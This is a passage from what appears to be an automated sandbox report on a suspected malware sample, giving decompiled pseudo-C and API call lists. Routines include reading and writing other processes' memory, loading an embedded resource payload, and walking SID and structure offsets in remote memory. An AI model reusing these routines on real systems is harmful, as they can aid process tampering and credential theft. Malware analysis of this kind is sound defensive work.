    					asm("sbb eax, eax");
    					_t72 = _t54 & _t95 + 0x00000008;
    					_t85 = _t95 + 8;
    					if((_t54 & _t95 + 0x00000008) > 0x400) {
    						__eflags = _t95 - _t85;
    						asm("sbb eax, eax");
    						_t81 = E10005DA1(_t85, _t72 & _t85);
    						_pop(_t85);
    						__eflags = _t81;
    						if(__eflags == 0) {
    							goto L36;
    						}
    						 *_t81 = 0xdddd;
    						L12:
    						_t81 =  &(_t81[4]);
    						goto L14;
    					}
    					asm("sbb eax, eax");
    					E10010250();
    					_t81 = _t107;
    					if(_t81 == 0) {
    						goto L36;
    					}
    					 *_t81 = 0xcccc;
    					goto L12;
    				}
    			}

    APIs
    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,00000000,1000405A,1000405A,?,?,?,1000B170,00000001,00000001,1BE85006), ref: 1000AF79
    • __alloca_probe_16.NTDLLP ref: 1000AFB1
    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,1000B170,00000001,00000001,1BE85006,?,?,?), ref: 1000AFFF
      • Part of subcall function 10006B9A: LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,1BE85006,00000001,?,000000FF), ref: 10006C0B
    • __alloca_probe_16.NTDLLP ref: 1000B096
      • Part of subcall function 10005DA1: RtlAllocateHeap.NTDLL(00000000,00000001,00000004,?,1000DDBB,00000001,00000000,?,10009B15,00000001,00000004,00000000,00000001,?,?,10005AA6), ref: 10005DD3
    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,1BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 1000B0F9
    • __freea.LIBCMT ref: 1000B106
    • __freea.LIBCMT ref: 1000B10F
      • Part of subcall function 10001B26: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 10001B6A
    • __freea.LIBCMT ref: 1000B134
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd

    Control-flow Graph

    C-Code - Quality: 100%
    			E10014010(void** __ecx, void** __edx, long _a4) {
    				intOrPtr _v4;
    				LONG* _v8;
    				long _v12;
    				void _t28;
    				void _t30;
    				void* _t33;
    				int _t35;
    				LONG* _t36;
    				void* _t43;
    				void* _t45;
    				long _t54;
    				LONG* _t61;
    				void* _t67;
    				void* _t68;
    
    				_t74 = __ecx;
    				_v4 = 0x1001f2d0;
    				_t61 = 0;
    				_t75 = __edx;
    				_v8 = 0;
    				_t3 =  &(_t74[1]); // 0x0
    				_t67 =  *_t3;
    				_t28 =  *_t67;
    				if(_t28 == 0) {
    					_t68 = __edx[1];
    					_t30 =  *_t68;
    					if(_t30 == 0) {
    						E10010340( *__ecx,  *__edx, _a4);
    						_t61 = 1;
    						goto L20;
    					} else {
    						_t33 = _t30 - 1;
    						if(_t33 == 0) {
    							_t35 = ReadProcessMemory( *( *(_t68 + 4)),  *__edx,  *__ecx, _a4, 0); // executed
    							return _t35;
    						} else {
    							_t36 = _t33 - 5;
    							if(_t36 != 0 || SetFilePointer( *( *(_t68 + 4)),  *__edx, _t36, _t36) == 0xffffffff) {
    								goto L20;
    							} else {
    								return ReadFile( *( *(_t75[1] + 4)),  *_t74, _a4,  &_v12, 0);
    							}
    						}
    					}
    				} else {
    					_t43 = _t28 - 1;
    					if(_t43 == 0) {
    						if( *(__edx[1]) != 0) {
    							goto L9;
    						} else {
    							return WriteProcessMemory( *( *(_t67 + 4)),  *__ecx,  *__edx, _a4, 0);
    						}
    					} else {
    						if(_t43 != 5) {
    							L20:
    							return _t61;
    						} else {
    							if( *(__edx[1]) != 0) {
    								L9:
    								_t76 = _a4;
    								_t45 = LocalAlloc(0x40, _a4);
    								_v8 = _t45;
    								if(_t45 == 0) {
    									goto L20;
    								} else {
    									if(E10014010( &_v8, _t75, _t76) != 0) {
    										_t61 = E10014010(_t74,  &_v8, _t76);
    									}
    									LocalFree(_v8);
    									return _t61;
    								}
    							} else {
    								_t54 =  *__ecx;
    								if(_t54 == 0 || SetFilePointer( *( *(_t67 + 4)), _t54, 0, 0) != 0) {
    									_t7 =  &(_t74[1]); // 0x0
    									return WriteFile( *( *( *_t7 + 4)),  *_t75, _a4,  &_v12, 0);
    								} else {
    									goto L20;
    								}
    							}
    						}
    					}
    				}
    			}

    APIs
    • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,?,10014919,000CAA50), ref: 100140B9
      • Part of subcall function 10014010: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 10014059
      • Part of subcall function 10014010: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1001407C
      • Part of subcall function 10014010: WriteProcessMemory.KERNEL32(?,1001F2D0,?,?,00000000), ref: 100140A2
      • Part of subcall function 10014010: LocalFree.KERNEL32(?,10012590), ref: 100140F3
    • SetFilePointer.KERNEL32(?,?,?,?), ref: 10014120
    • ReadFile.KERNEL32(?,1001F2D0,?,?,00000000), ref: 10014140
    • ReadProcessMemory.KERNELBASE(?,?,1001F2D0,?,00000000), ref: 1001415F
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd

    Control-flow Graph

    C-Code - Quality: 95%
    			E00C61BE0(void* __ecx, WCHAR** _a4) {
    				void* _v8;
    				struct HINSTANCE__* _t7;
    				struct HRSRC__* _t8;
    				void* _t10;
    				void* _t11;
    				struct HRSRC__* _t17;
    				struct HINSTANCE__* _t24;
    				WCHAR* _t26;
    				WCHAR** _t30;
    
    				_push(__ecx);
    				_t30 = _a4;
    				if(_t30 == 0) {
    					return 0;
    				} else {
    					_t30[1] = 0;
    					 *_t30 = 0;
    					_t7 = GetModuleHandleW(0);
    					_t24 = _t7;
    					if(_t24 != 0) {
    						_t8 = FindResourceW(_t24, 0x65, "BMP"); // executed
    						_t17 = _t8;
    						if(_t17 == 0) {
    							L8:
    							return 0;
    						} else {
    							_t10 = LoadResource(_t24, _t17);
    							if(_t10 == 0) {
    								goto L8;
    							} else {
    								_t11 = LockResource(_t10);
    								_v8 = _t11;
    								if(_t11 == 0) {
    									goto L8;
    								} else {
    									_t26 = SizeofResource(_t24, _t17);
    									if(_t26 == 0 || E00C619C0(_t26, _t30) == 0) {
    										goto L8;
    									} else {
    										E00C5DF30( *_t30, _v8, _t26);
    										_t30[1] = _t26;
    										return 1;
    									}
    								}
    							}
    						}
    					} else {
    						return _t7;
    					}
    				}
    			}

    APIs
    • GetModuleHandleW.KERNEL32(00000000), ref: 00C61C00
    • FindResourceW.KERNEL32(00000000,00000065,BMP), ref: 00C61C1B
    • LoadResource.KERNEL32(00000000,00000000), ref: 00C61C29
    • LockResource.KERNEL32(00000000), ref: 00C61C34
    • SizeofResource.KERNEL32(00000000,00000000), ref: 00C61C43
      • Part of subcall function 00C619C0: GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,00C61C58), ref: 00C619D1
      • Part of subcall function 00C619C0: RtlAllocateHeap.NTDLL(00000000), ref: 00C619D8
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd

    Control-flow Graph

    C-Code - Quality: 69%
    			E00C5B9FF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
    				signed int _v8;
    				int _v12;
    				void* _v24;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t49;
    				signed int _t54;
    				int _t58;
    				signed int _t60;
    				short* _t62;
    				signed int _t66;
    				short* _t70;
    				int _t71;
    				int _t78;
    				void* _t80;
    				short* _t81;
    				signed int _t87;
    				signed int _t90;
    				void* _t95;
    				void* _t96;
    				int _t98;
    				void* _t99;
    				short* _t101;
    				int _t103;
    				void* _t104;
    				signed int _t106;
    				short* _t107;
    				void* _t110;
    
    				_push(__ecx);
    				_push(__ecx);
    				_t49 =  *0xc6a004; // 0x26d30358
    				_v8 = _t49 ^ _t106;
    				_t103 = _a20;
    				if(_t103 > 0) {
    					_t78 = E00C5BFB6(_a16, _t103);
    					_t110 = _t78 - _t103;
    					_t4 = _t78 + 1; // 0x1
    					_t103 = _t4;
    					if(_t110 >= 0) {
    						_t103 = _t78;
    					}
    				}
    				_t98 = _a32;
    				if(_t98 == 0) {
    					_t98 =  *( *_a4 + 8);
    					_a32 = _t98;
    				}
    				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
    				_v12 = _t54;
    				if(_t54 == 0) {
    					L38:
    					_pop(_t99);
    					_pop(_t104);
    					_pop(_t80);
    					return E00C51252(_t80, _v8 ^ _t106, _t99, _t104);
    				} else {
    					_t95 = _t54 + _t54;
    					_t85 = _t95 + 8;
    					asm("sbb eax, eax");
    					if((_t95 + 0x00000008 & _t54) == 0) {
    						_t81 = 0;
    						__eflags = 0;
    						L14:
    						if(_t81 == 0) {
    							L36:
    							_t105 = 0;
    							L37:
    							E00C59BA7(_t81);
    							goto L38;
    						}
    						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
    						_t121 = _t58;
    						if(_t58 == 0) {
    							goto L36;
    						}
    						_t100 = _v12;
    						_t60 = E00C59349(_t81, _t85, _v12, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0); // executed
    						_t105 = _t60;
    						if(_t105 == 0) {
    							goto L36;
    						}
    						if((_a12 & 0x00000400) == 0) {
    							_t96 = _t105 + _t105;
    							_t87 = _t96 + 8;
    							__eflags = _t96 - _t87;
    							asm("sbb eax, eax");
    							__eflags = _t87 & _t60;
    							if((_t87 & _t60) == 0) {
    								_t101 = 0;
    								__eflags = 0;
    								L30:
    								__eflags = _t101;
    								if(__eflags == 0) {
    									L35:
    									E00C59BA7(_t101);
    									goto L36;
    								}
    								_t62 = E00C59349(_t81, _t87, _t101, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
    								__eflags = _t62;
    								if(_t62 == 0) {
    									goto L35;
    								}
    								_push(0);
    								_push(0);
    								__eflags = _a28;
    								if(_a28 != 0) {
    									_push(_a28);
    									_push(_a24);
    								} else {
    									_push(0);
    									_push(0);
    								}
    								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
    								__eflags = _t105;
    								if(_t105 != 0) {
    									E00C59BA7(_t101);
    									goto L37;
    								} else {
    									goto L35;
    								}
    							}
    							_t90 = _t96 + 8;
    							__eflags = _t96 - _t90;
    							asm("sbb eax, eax");
    							_t66 = _t60 & _t90;
    							_t87 = _t96 + 8;
    							__eflags = _t66 - 0x400;
    							if(_t66 > 0x400) {
    								__eflags = _t96 - _t87;
    								asm("sbb eax, eax");
    								_t101 = E00C561AB(_t87, _t66 & _t87);
    								_pop(_t87);
    								__eflags = _t101;
    								if(_t101 == 0) {
    									goto L35;
    								}
    								 *_t101 = 0xdddd;
    								L28:
    								_t101 =  &(_t101[4]);
    								goto L30;
    							}
    							__eflags = _t96 - _t87;
    							asm("sbb eax, eax");
    							E00C5DD20();
    							_t101 = _t107;
    							__eflags = _t101;
    							if(_t101 == 0) {
    								goto L35;
    							}
    							 *_t101 = 0xcccc;
    							goto L28;
    						}
    						_t70 = _a28;
    						if(_t70 == 0) {
    							goto L37;
    						}
    						_t125 = _t105 - _t70;
    						if(_t105 > _t70) {
    							goto L36;
    						}
    						_t71 = E00C59349(_t81, 0, _t100, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
    						_t105 = _t71;
    						if(_t71 != 0) {
    							goto L37;
    						}
    						goto L36;
    					}
    					asm("sbb eax, eax");
    					_t72 = _t54 & _t95 + 0x00000008;
    					_t85 = _t95 + 8;
    					if((_t54 & _t95 + 0x00000008) > 0x400) {
    						__eflags = _t95 - _t85;
    						asm("sbb eax, eax");
    						_t81 = E00C561AB(_t85, _t72 & _t85);
    						_pop(_t85);
    						__eflags = _t81;
    						if(__eflags == 0) {
    							goto L36;
    						}
    						 *_t81 = 0xdddd;
    						L12:
    						_t81 =  &(_t81[4]);
    						goto L14;
    					}
    					asm("sbb eax, eax");
    					E00C5DD20();
    					_t81 = _t107;
    					if(_t81 == 0) {
    						goto L36;
    					}
    					 *_t81 = 0xcccc;
    					goto L12;
    				}
    			}

    APIs
    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00C5BC50,?,?,00000000), ref: 00C5BA59
    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00C5BC50,?,?,00000000,?,?,?), ref: 00C5BADF
      • Part of subcall function 00C59349: LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00C593BA
      • Part of subcall function 00C561AB: RtlAllocateHeap.NTDLL(00000000,00C51FCA,?,?,00C534C0,?,?,1FFFFFFF,?,?,00C51EFE,00C51FCA,?,?,?,?), ref: 00C561DD
    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00C5BBD9
    • __freea.LIBCMT ref: 00C5BBE6
    • __freea.LIBCMT ref: 00C5BBEF
      • Part of subcall function 00C51252: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00C514FE
    • __freea.LIBCMT ref: 00C5BC14
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd

    Control-flow Graph
    C-Code - Quality: 65%
    			E00C53F46(signed int _a4) {
    				void* _t10;
    				void* _t13;
    				signed int _t15;
    				signed int _t21;
    				WCHAR* _t22;
    				signed int* _t25;
    				void* _t27;
    
    				_t21 = _a4;
    				_t25 = 0xc6ad54 + _t21 * 4;
    				asm("lock cmpxchg [edi], ecx");
    				if(0 == 0) {
    					_t22 =  *(0xc63264 + _t21 * 4);
    					_t10 = LoadLibraryExW(_t22, 0, 0x800); // executed
    					_t27 = _t10;
    					if(_t27 != 0) {
    						L8:
    						 *_t25 = _t27;
    						if( *_t25 != 0) {
    							FreeLibrary(_t27);
    						}
    						_t13 = _t27;
    						L11:
    						return _t13;
    					}
    					_t15 = GetLastError();
    					if(_t15 != 0x57) {
    						_t27 = 0;
    					} else {
    						_t15 = LoadLibraryExW(_t22, _t27, _t27);
    						_t27 = _t15;
    					}
    					if(_t27 != 0) {
    						goto L8;
    					} else {
    						 *_t25 = _t15 | 0xffffffff;
    						_t13 = 0;
    						goto L11;
    					}
    				}
    				asm("sbb eax, eax");
    				return  ~0x00000001 & 0;
    			}











    APIs
    • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,00C6AD38,?,?,00C53EED,?,00C6AD38,00000000,?,?,00C540CF,00000008,InitializeCriticalSectionEx), ref: 00C53F7E
    • GetLastError.KERNEL32(?,?,00C53EED,?,00C6AD38,00000000,?,?,00C540CF,00000008,InitializeCriticalSectionEx,00C63360,InitializeCriticalSectionEx,00000000,?,00C53E34), ref: 00C53F8A
    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,?,00C53EED,?,00C6AD38,00000000,?,?,00C540CF,00000008,InitializeCriticalSectionEx,00C63360,InitializeCriticalSectionEx), ref: 00C53F98
    • FreeLibrary.KERNEL32(00000000,?,?,00C53EED,?,00C6AD38,00000000,?,?,00C540CF,00000008,InitializeCriticalSectionEx,00C63360,InitializeCriticalSectionEx,00000000), ref: 00C53FBA
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd

    Control-flow Graph
    C-Code - Quality: 65%
    			E1000238B(signed int _a4) {
    				void* _t10;
    				void* _t13;
    				signed int _t15;
    				signed int _t21;
    				WCHAR* _t22;
    				signed int* _t25;
    				void* _t27;
    
    				_t21 = _a4;
    				_t25 = 0x1001ebc0 + _t21 * 4;
    				asm("lock cmpxchg [edi], ecx");
    				if(0 == 0) {
    					_t22 =  *(0x1001518c + _t21 * 4);
    					_t10 = LoadLibraryExW(_t22, 0, 0x800); // executed
    					_t27 = _t10;
    					if(_t27 != 0) {
    						L8:
    						 *_t25 = _t27;
    						if( *_t25 != 0) {
    							FreeLibrary(_t27);
    						}
    						_t13 = _t27;
    						L11:
    						return _t13;
    					}
    					_t15 = GetLastError();
    					if(_t15 != 0x57) {
    						_t27 = 0;
    					} else {
    						_t15 = LoadLibraryExW(_t22, _t27, _t27);
    						_t27 = _t15;
    					}
    					if(_t27 != 0) {
    						goto L8;
    					} else {
    						 *_t25 = _t15 | 0xffffffff;
    						_t13 = 0;
    						goto L11;
    					}
    				}
    				asm("sbb eax, eax");
    				return  ~0x00000001 & 0;
    			}











    APIs
    • LoadLibraryExW.KERNELBASE(?,00000000,00000800,?,00000001,?,?,10002332,?,00000001,00000000,?,?,10002460,00000005,FlsFree), ref: 100023C3
    • GetLastError.KERNEL32(?,10002332,?,00000001,00000000,?,?,10002460,00000005,FlsFree,10015250,FlsFree,00000000,?,10002275,00000005), ref: 100023CF
    • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,10002332,?,00000001,00000000,?,?,10002460,00000005,FlsFree,10015250,FlsFree,00000000), ref: 100023DD
    • FreeLibrary.KERNEL32(00000000,?,10002332,?,00000001,00000000,?,?,10002460,00000005,FlsFree,10015250,FlsFree,00000000,?,10002275), ref: 100023FF
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd

    Control-flow Graph
    C-Code - Quality: 95%
    			E00C59111(signed int _a4) {
    				signed int _t9;
    				void* _t10;
    				void* _t13;
    				signed int _t15;
    				WCHAR* _t22;
    				signed int _t24;
    				signed int* _t25;
    				void* _t27;
    
    				_t9 = _a4;
    				_t25 = 0xc6b3b8 + _t9 * 4;
    				_t24 =  *_t25;
    				if(_t24 == 0) {
    					_t22 =  *(0xc64298 + _t9 * 4);
    					_t10 = LoadLibraryExW(_t22, 0, 0x800); // executed
    					_t27 = _t10;
    					if(_t27 != 0) {
    						L8:
    						 *_t25 = _t27;
    						if( *_t25 != 0) {
    							FreeLibrary(_t27);
    						}
    						_t13 = _t27;
    						L11:
    						return _t13;
    					}
    					_t15 = GetLastError();
    					if(_t15 != 0x57) {
    						_t27 = 0;
    					} else {
    						_t15 = LoadLibraryExW(_t22, _t27, _t27);
    						_t27 = _t15;
    					}
    					if(_t27 != 0) {
    						goto L8;
    					} else {
    						 *_t25 = _t15 | 0xffffffff;
    						_t13 = 0;
    						goto L11;
    					}
    				}
    				_t4 = _t24 + 1; // 0x26d30359
    				asm("sbb eax, eax");
    				return  ~_t4 & _t24;
    			}












    APIs
    • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,00000000,00000000,?,00C590B8,?,00000000,00000000,00000000,?,00C592B5,00000006,FlsSetValue), ref: 00C59143
    • GetLastError.KERNEL32(?,00C590B8,?,00000000,00000000,00000000,?,00C592B5,00000006,FlsSetValue,00C64750,00C64758,00000000,00000364,?,00C58072), ref: 00C5914F
    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00C590B8,?,00000000,00000000,00000000,?,00C592B5,00000006,FlsSetValue,00C64750,00C64758,00000000), ref: 00C5915D
    • FreeLibrary.KERNEL32(00000000,?,00C590B8,?,00000000,00000000,00000000,?,00C592B5,00000006,FlsSetValue,00C64750,00C64758,00000000,00000364), ref: 00C5917F
    Memory Dump Source
    • Source File: 00000003.00000002.1560617479.00C51000.00000020.sdmp, Offset: 00C50000, based on PE: true
    • Associated: 00000003.00000002.1560609893.00C50000.00000002.sdmp
    • Associated: 00000003.00000002.1560640058.00C63000.00000002.sdmp
    • Associated: 00000003.00000002.1560651102.00C6A000.00000004.sdmp
    • Associated: 00000003.00000002.1560658398.00C6C000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_c50000_ucngw.jbxd

    Control-flow Graph
    C-Code - Quality: 95%
    			E10006962(signed int _a4) {
    				signed int _t9;
    				void* _t10;
    				void* _t13;
    				signed int _t15;
    				WCHAR* _t22;
    				signed int _t24;
    				signed int* _t25;
    				void* _t27;
    
    				_t9 = _a4;
    				_t25 = 0x1001ed88 + _t9 * 4;
    				_t24 =  *_t25;
    				if(_t24 == 0) {
    					_t22 =  *(0x10016758 + _t9 * 4);
    					_t10 = LoadLibraryExW(_t22, 0, 0x800); // executed
    					_t27 = _t10;
    					if(_t27 != 0) {
    						L8:
    						 *_t25 = _t27;
    						if( *_t25 != 0) {
    							FreeLibrary(_t27);
    						}
    						_t13 = _t27;
    						L11:
    						return _t13;
    					}
    					_t15 = GetLastError();
    					if(_t15 != 0x57) {
    						_t27 = 0;
    					} else {
    						_t15 = LoadLibraryExW(_t22, _t27, _t27);
    						_t27 = _t15;
    					}
    					if(_t27 != 0) {
    						goto L8;
    					} else {
    						 *_t25 = _t15 | 0xffffffff;
    						_t13 = 0;
    						goto L11;
    					}
    				}
    				_t4 = _t24 + 1; // 0x26c1db25
    				asm("sbb eax, eax");
    				return  ~_t4 & _t24;
    			}












    APIs
    • LoadLibraryExW.KERNELBASE(?,00000000,00000800,?,?,00000001,?,10006909,?,00000001,00000000,?,?,10006CE0,00000008,GetCurrentPackageId), ref: 10006994
    • GetLastError.KERNEL32(?,10006909,?,00000001,00000000,?,?,10006CE0,00000008,GetCurrentPackageId,10016C18,GetCurrentPackageId,00000000), ref: 100069A0
    • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,10006909,?,00000001,00000000,?,?,10006CE0,00000008,GetCurrentPackageId,10016C18,GetCurrentPackageId,00000000), ref: 100069AE
    • FreeLibrary.KERNEL32(00000000,?,10006909,?,00000001,00000000,?,?,10006CE0,00000008,GetCurrentPackageId,10016C18,GetCurrentPackageId,00000000), ref: 100069D0
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd

    Control-flow Graph
    C-Code - Quality: 91%
    			E10012FF0(signed int* _a4, intOrPtr _a8) {
    				short _v6;
    				void* _v10;
    				void* _v16;
    				signed short _v20;
    				intOrPtr _v24;
    				void _v28;
    				intOrPtr _v32;
    				void* _v36;
    				intOrPtr _v40;
    				char _v44;
    				signed int _t43;
    				signed char _t45;
    				void* _t46;
    				void* _t48;
    				void* _t56;
    				signed short _t60;
    				void* _t62;
    				signed int _t65;
    				signed int _t70;
    				intOrPtr _t78;
    				void* _t87;
    				signed int _t88;
    				void* _t90;
    				void* _t91;
    				void* _t92;
    
    				_t90 = (_t88 & 0xfffffff8) - 0x28;
    				_t75 =  *0x1001f2b4 * 0x7c;
    				_t85 = _a8;
    				asm("xorps xmm0, xmm0");
    				_t82 = _a4;
    				_v28 = 0;
    				_v10 = 0;
    				_v6 = 0;
    				_t65 =  *_a4;
    				_v36 = 0;
    				asm("movups [esp+0x1a], xmm0");
    				_v32 = 0x1001f2d0;
    				_v44 =  *((intOrPtr*)(_a8 +  *((intOrPtr*)(0x1001a95c +  *0x1001f2b4 * 0x7c))));
    				_v40 =  *_t65;
    				_t43 =  *(_t65 + 0xc);
    				if(_t43 >= 0x2800) {
    					asm("sbb eax, eax");
    					_t45 = (_t43 & 0x000f0000) + 0x10000;
    				} else {
    					_t45 = 0;
    				}
    				_t46 = E10011D50( *((intOrPtr*)(_t75 + 0x1001a94c)) + _t85, _t82, _t45); // executed
    				_t91 = _t90 + 4;
    				if(_v44 == 0) {
    					L12:
    					return _t46;
    				} else {
    					_t15 = 0x1001a9c0 +  *0x1001f2b4 * 0x7c; // 0x20
    					_t46 = LocalAlloc(0x40,  *_t15);
    					_t87 = _t46;
    					if(_t87 == 0) {
    						goto L12;
    					}
    					_v36 = _t87;
    					_t48 = E10014010( &_v36,  &_v44,  *(0x1001a9c0 +  *0x1001f2b4 * 0x7c));
    					_t92 = _t91 + 4;
    					if(_t48 == 0) {
    						L11:
    						_t46 = LocalFree(_t87);
    						goto L12;
    					}
    					_t70 =  *0x1001f2b4 * 0x7c;
    					_v28 =  *_t87;
    					_v24 =  *((intOrPtr*)(_t87 + 4));
    					_t78 =  *((intOrPtr*)(_t87 +  *((intOrPtr*)(_t70 + 0x1001a9b8))));
    					if(_t78 != 0) {
    						_t60 =  *((intOrPtr*)(_t70 + 0x1001a9c0)) -  *((intOrPtr*)(_t70 + 0x1001a9bc)) + _t78;
    						_v20 = _t60;
    						_t62 = LocalAlloc(0x40, _t60 & 0x0000ffff);
    						_v16 = _t62;
    						if(_t62 != 0) {
    							_v36 = _t62;
    							_v44 = _v44 +  *((intOrPtr*)(0x1001a9bc +  *0x1001f2b4 * 0x7c));
    							E10014010( &_v36,  &_v44, _v20 & 0x0000ffff);
    							_t92 = _t92 + 4;
    						}
    					}
    					asm("sbb eax, eax");
    					E10011D50( &_v28, _t82, ( *_t82 & 0x10000000) + 0x800000);
    					_t56 = _v16;
    					if(_t56 != 0) {
    						LocalFree(_t56);
    					}
    					goto L11;
    				}
    			}





























    APIs
      • Part of subcall function 10011D50: ConvertSidToStringSidW.ADVAPI32(?,?), ref: 10011D86
      • Part of subcall function 10011D50: LocalFree.KERNEL32(?), ref: 10011FFE
      • Part of subcall function 10011D50: LocalFree.KERNEL32(?), ref: 1001200B
      • Part of subcall function 10011D50: LocalFree.KERNEL32(?), ref: 10012018
      • Part of subcall function 10011D50: LocalFree.KERNEL32(?), ref: 1001202C
    • LocalAlloc.KERNEL32(00000040,00000020), ref: 1001308D
      • Part of subcall function 10014010: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 10014059
      • Part of subcall function 10014010: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1001407C
      • Part of subcall function 10014010: WriteProcessMemory.KERNEL32(?,1001F2D0,?,?,00000000), ref: 100140A2
      • Part of subcall function 10014010: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,?,10014919,000CAA50), ref: 100140B9
      • Part of subcall function 10014010: LocalFree.KERNEL32(?,10012590), ref: 100140F3
      • Part of subcall function 10014010: SetFilePointer.KERNEL32(?,?,?,?), ref: 10014120
      • Part of subcall function 10014010: ReadFile.KERNEL32(?,1001F2D0,?,?,00000000), ref: 10014140
      • Part of subcall function 10014010: ReadProcessMemory.KERNELBASE(?,?,1001F2D0,?,00000000), ref: 1001415F
    • LocalAlloc.KERNEL32(00000040,?), ref: 10013103
    • LocalFree.KERNEL32(?), ref: 10013169
    • LocalFree.KERNEL32(00000000), ref: 10013170
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    C-Code - Quality: 97%
    			E10014190(intOrPtr __ecx, void* __edx) {
    				intOrPtr _t45;
    				intOrPtr _t57;
